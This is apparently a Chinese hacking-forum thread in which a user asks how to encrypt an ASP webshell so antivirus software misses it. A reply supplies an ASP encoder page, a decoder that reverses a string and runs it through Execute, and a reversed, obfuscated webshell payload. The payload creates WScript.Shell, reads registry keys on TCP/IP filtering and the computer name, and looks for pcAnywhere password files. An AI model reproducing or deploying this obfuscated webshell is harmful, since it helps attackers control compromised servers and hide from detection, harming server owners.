webshell 加密函数已经写出来了,如何加密webshell
Function ShiSanFun(ShiSanObjstr)ShiSanObjstr = Replace(ShiSanObjstr, "╁", """")
For ShiSanI = 1 To Len(ShiSanObjstr)
If Mid(ShiSanObjstr, ShiSanI, 1) <> "╋" Then
ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) +ShiSanNewStr
Else
ShiSanNewStr = vbCrLf + ShiSanNewStr
End If
Next
ShiSanFun = ShiSanNewStr
End Function
这是网上流传的一段加解密代码
根据解密代码已经写好加密代码
想免杀webshell,可是具体过程不清楚。
用加密代码加密了webshell中的function 和end function 中间的代码后运行提示 类型不匹配
但是如果自己写一段代码如response.write “abc”
加密后能够成功解密运行输出abc
求解原因。 运行提示 类型不匹配
哪个代码出问题了? [b] [url=http://www.3ast.com.cn/redirect.php?goto=findpost&pid=57238&ptid=11116]2#[/url] [i]柔肠寸断[/i] [/b]
这是加密函数
<html>
<body>
<form name="test" method="post" action="">
<textarea name="a" cols="160" rows="20"></textarea><br>
<input type="submit" value="加密">
</form>
<%
dim str,newstr,ps,i
str=Request.Form("a")
newstr=replace(str,"""","`")
newstr=replace(newstr,chr(13)&chr(10),"~")
for i=1 to len(newstr)
ps=mid(newstr,i,1)&ps
next
Response.write "加密结果↓↓↓↓↓"&"<br>"
%>
<textarea name="b" cols="160" rows="20">yjx="<%Response.write ps%>"
call unhack(yjx)</textarea>
</body></html>
下面是webshell中的
function unhack(a)
dim newstr,ps,i,str
str=a
newstr=replace(str,"`","""")
newstr=replace(newstr,"~",chr(13)&chr(10))
for i=1 to len(newstr)
ps=mid(newstr,i,1)&ps
next
ExeCuTe(ps)
end function
yjx="buS dnE~fi dnE~`码密erehwynAcp到得解破并载下录目认默从以可,件文码密erehwynAcp现发>il<` etirW.esnopseR~nehT )`fic.`&emanrevres&`\cetnamyS\ataD noitacilppA\sresU llA\sgnitteS dnA stnemucoD\`&revirdsys(stsixEeliF.osf fI~)`emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH`(daeRgeR.hsw=emanrevres~)2,)2(redloFlaicepsteG.osF(tfel=evirdsyS~rb<置设=BdpA~1-)sdpA(dnuoBU oT )sdpA(dnuoBL=i roF~ nehT )sdpA(yarrAsI fI~)yeKdpA……………………………………方便浏览中间省略部分加密……………………………………………………………………(daeRgeR.hsW=sdpA~`dniB\egakniL\pipcT\secivreS\100teSlortnoC\METSYS\MLKH`=yeKdpA~fI dnE~1=retlifpipctoN~nehT ``=elbanEsi ro 0=elbanEsi fI~)yeKpipcTelbanE(daergeR.hsW=elbanEsi~`sretliFytiruceSelbanE\sretemaraP\pipcT\secivreS\teSlortnoCtnerruc\METSYS\MLKH`=yeKPIPCTelbanE~`>1=ezis rh<>rb<]测探络网[` etirW.esnopseR~)`llehS.tpircsW`(tcejboetaerc=hsw tes~hsw mid~txen emuser rorre no~)(ofnIlanimreTteG buS"
call unhack(yjx)
页:
[1]